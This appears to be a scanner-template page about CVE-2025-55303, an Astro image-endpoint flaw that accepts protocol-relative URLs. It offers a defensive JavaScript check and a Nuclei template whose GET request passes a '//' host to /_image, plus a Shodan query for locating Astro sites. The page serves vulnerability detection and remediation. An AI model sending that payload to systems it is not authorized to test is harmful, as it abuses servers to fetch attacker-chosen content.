Astro - Unauthorized Third-Party Image Access
CVE-2025-55303
Verified
Description
Astro < 5.13.2 and < 4.16.18 contains an information disclosure vulnerability caused by improper validation of protocol-relative URLs in the image optimization endpoint, letting attackers serve images from unauthorized third-party domains. Exploitation requires an on-demand rendering deployment.
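The root cause is a validation step that treats any `href` beginning with "/" as a same-site path, which a protocol-relative value such as `//host/path` satisfies while actually pointing at another origin. The following is an added illustration, not Astro's source: a naive prefix check beside a hardened check that resolves the href against the site origin before deciding. The site origin and allow list are constructed example values.

```javascript
// Added example (not Astro's code): classifying the `href` passed to an
// image-optimization endpoint. SITE_ORIGIN and ALLOWED_HOSTS are constructed.
const SITE_ORIGIN = "https://site.example";
const ALLOWED_HOSTS = new Set(["images.example"]);

// Naive classifier of the kind behind this bug class: a leading "/" is taken
// as proof that the image lives on the site itself. "//host/path" passes too.
function naiveIsLocal(href) {
  return href.startsWith("/");
}

// Hardened classifier: resolve the href relative to the site origin first, so
// a protocol-relative value becomes an absolute URL with its real host, then
// allow only same-origin images or hosts on an explicit allow list.
function classifyImageHref(href, siteOrigin = SITE_ORIGIN, allowedHosts = ALLOWED_HOSTS) {
  let url;
  try {
    url = new URL(href, siteOrigin);
  } catch {
    return { allowed: false, reason: "unparseable" };
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return { allowed: false, reason: "scheme", host: url.host };
  }
  if (url.origin === new URL(siteOrigin).origin) {
    return { allowed: true, reason: "same-origin", host: url.host };
  }
  if (allowedHosts.has(url.hostname)) {
    return { allowed: true, reason: "allow-list", host: url.host };
  }
  return { allowed: false, reason: "third-party", host: url.host };
}

// Constructed sample hrefs; the second is the protocol-relative form this
// advisory concerns. The naive check calls it local, the hardened one does not.
const SAMPLES = [
  "/assets/hero.png",
  "//third-party.example/600x400",
  "https://images.example/a.png",
];
for (const href of SAMPLES) {
  console.log(href, "naiveIsLocal:", naiveIsLocal(href), classifyImageHref(href));
}
```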
Severity
Medium
CVSS Score
6.4
Exploit Probability
1%
Published Date
January 20, 2026
Template Author
theamanrawat
CVE-2025-55303.yaml
id: CVE-2025-55303

info:
  name: Astro - Unauthorized Third-Party Image Access
  author: theamanrawat
  severity: medium
  description: |
    Astro < 5.13.2 and < 4.16.18 contains an information disclosure vulnerability caused by improper validation of protocol-relative URLs in the image optimization endpoint, letting attackers serve images from unauthorized third-party domains, exploit requires on-demand rendering deployment.
  impact: |
    Attackers can serve images from unauthorized third-party domains, potentially leading to information disclosure or content spoofing.
  remediation: |
    Update to versions 5.13.2 or 4.16.18 or later.
  reference:
    - https://github.com/advisories/GHSA-xf8x-j4p2-f749
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55303
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
    cvss-score: 6.4
    cve-id: CVE-2025-55303
    epss-score: 0.00599
    epss-percentile: 0.44133
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"astro"
  tags: cve,cve2025,astro,ssrf,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/_image?href=//{{interactsh-url}}/600x400"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'interactsh_protocol == "http"'
          - 'contains(header, "image/")'
        condition: and
# digest: 4a0a00473045022004c1a29c7cde0cf0c9c4bfc0e42233e1b47d705b54aea62d765e323114f38d04022100f4d452f69b2d6bfd7ebb73d1ac89adec3fbd3ccccaae8f2de17b75d09ffdb3e9:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
CVE ID: CVE-2025-55303
CWE ID: CWE-79
Remediation Steps
Update to versions 5.13.2 or 4.16.18 or later.